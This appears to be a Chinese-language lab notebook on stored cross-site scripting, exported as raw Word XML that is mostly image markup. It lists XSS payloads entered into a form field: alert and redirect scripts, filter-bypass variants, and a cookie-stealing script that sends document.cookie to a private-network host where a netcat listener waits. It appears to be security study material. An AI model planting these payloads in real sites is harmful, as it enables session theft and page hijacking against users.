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存储XSS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长期存储于服务器端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每次用户访问都会被执行javascript脚本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15865" cy="3556635"/>
            <wp:effectExtent l="0" t="0" r="133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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="7887970" cy="1687195"/>
            <wp:effectExtent l="0" t="0" r="177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8797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直接嵌入</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('xss')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="7856220" cy="286131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5622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73240" cy="36099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客户机 （Windows 7）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="7629525" cy="5753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&lt;body onload=alert('xss')&gt;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63030" cy="3018155"/>
            <wp:effectExtent l="0" t="0" r="1397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7896225" cy="4135120"/>
            <wp:effectExtent l="0" t="0" r="952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10475" cy="5734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&lt;script&gt;alert(/xss/)&lt;/script&gt;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895590" cy="3969385"/>
            <wp:effectExtent l="0" t="0" r="1016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898765" cy="3798570"/>
            <wp:effectExtent l="0" t="0" r="698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9876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00950" cy="5762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&lt;script&gt;alert(123)&lt;/script&gt;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894955" cy="3982720"/>
            <wp:effectExtent l="0" t="0" r="1079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495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896225" cy="3939540"/>
            <wp:effectExtent l="0" t="0" r="952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91425" cy="5705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在Name里写 有于长度的原因也可以在软件上修改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</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="7897495" cy="3869055"/>
            <wp:effectExtent l="0" t="0" r="825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9749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切换到软件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491730" cy="3373120"/>
            <wp:effectExtent l="0" t="0" r="1397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1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896225" cy="3918585"/>
            <wp:effectExtent l="0" t="0" r="952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然后放行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="7896225" cy="3530600"/>
            <wp:effectExtent l="0" t="0" r="952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898130" cy="3749040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9813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48575" cy="5753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&lt;script&gt;window.location="http://www.baidu.com"&lt;/script&gt;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524875" cy="4319905"/>
            <wp:effectExtent l="0" t="0" r="952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753475" cy="43434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10708640" cy="5231130"/>
            <wp:effectExtent l="0" t="0" r="165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08640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获取cookie值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┌──(root💀kali)-[/var/www/html]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└─# nc -vnlp 88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6075" cy="1009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&lt;script&gt;new Image().src="http://192.168.40.143:88/c.php?output="+document.cookie;&lt;/script&gt;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7894955" cy="3091180"/>
            <wp:effectExtent l="0" t="0" r="10795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9495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查看cookie值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7181850" cy="2266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客户机（Windows 7）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="7903210" cy="22040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0321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609080" cy="5502910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550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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="7889875" cy="1777365"/>
            <wp:effectExtent l="0" t="0" r="1587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9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898130" cy="3175000"/>
            <wp:effectExtent l="0" t="0" r="762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9813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&lt;scRipt&gt;alert('xss')&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="7900670" cy="2091690"/>
            <wp:effectExtent l="0" t="0" r="508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0067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898130" cy="260985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981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&lt;scr&lt;scr&gt;ipt&gt;alert('xss')&lt;/script&gt;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900035" cy="2525395"/>
            <wp:effectExtent l="0" t="0" r="571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9000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892415" cy="2376170"/>
            <wp:effectExtent l="0" t="0" r="1333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9241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773545" cy="5061585"/>
            <wp:effectExtent l="0" t="0" r="825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7354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/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="10704195" cy="2340610"/>
            <wp:effectExtent l="0" t="0" r="1905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041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&lt;a href ='' onclick=alert('你是猪')&gt;登录&lt;/a&gt;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899400" cy="1753870"/>
            <wp:effectExtent l="0" t="0" r="6350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00670" cy="2523490"/>
            <wp:effectExtent l="0" t="0" r="508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006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01305" cy="2995295"/>
            <wp:effectExtent l="0" t="0" r="4445" b="146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0130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&lt;a href=http://www.4399.com&gt;sofd&lt;/a&gt;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点击执行后</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="7897495" cy="3015615"/>
            <wp:effectExtent l="0" t="0" r="8255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9749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893050" cy="3345815"/>
            <wp:effectExtent l="0" t="0" r="1270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9305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改成</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="7902575" cy="3778250"/>
            <wp:effectExtent l="0" t="0" r="3175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257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901305" cy="3855720"/>
            <wp:effectExtent l="0" t="0" r="4445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130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890510" cy="3208020"/>
            <wp:effectExtent l="0" t="0" r="15240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890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901940" cy="3812540"/>
            <wp:effectExtent l="0" t="0" r="3810" b="165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019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存储原理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存储型xss是hacker向服务器注入一段js代码，代码存储到服务器的数据库中，每当用户访问服务器当中带有js代码的数据时，服务器将响应用户，返回给用户一个带有js代码页面</w:t>
      </w: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46259"/>
    <w:rsid w:val="37585991"/>
    <w:rsid w:val="3B6B0598"/>
    <w:rsid w:val="5674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2021-06-21T07:06:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-21T11:37:29Z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